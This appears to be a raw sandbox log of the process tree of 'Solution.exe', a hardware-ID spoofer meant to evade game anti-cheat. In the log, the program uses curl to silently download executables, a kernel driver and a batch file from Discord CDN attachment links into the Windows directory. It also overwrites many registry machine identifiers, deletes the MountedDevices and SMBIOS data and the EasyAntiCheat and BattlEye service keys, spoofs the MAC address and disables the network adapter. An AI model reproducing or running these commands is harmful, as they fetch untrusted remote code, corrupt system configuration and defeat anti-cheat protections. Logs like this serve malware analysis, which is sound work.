- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3044
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2956
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3676
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3296
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1704
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3484
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5000
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3220
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2588
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3604
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    PID:712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:4072
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:2940
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:4376
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:2336
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:3692
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:524
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1500
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:3356
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:408
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3720
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d C601DD284240 /f
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4016
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1204
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:3340
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3856
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:3300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:1984
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    PID:2904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:1404
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:3128
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:4732
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:4180
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2656
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:3688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:4024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    - Modifies registry key
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:3648
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3336
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2244
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3028
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1360
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    - Modifies registry key
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:776
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2680
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5068
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2132
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:460
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5052
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:536
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2236
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3836
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    - Modifies registry key
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3508
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3044
- - C:\Windows\system32\reg.exe
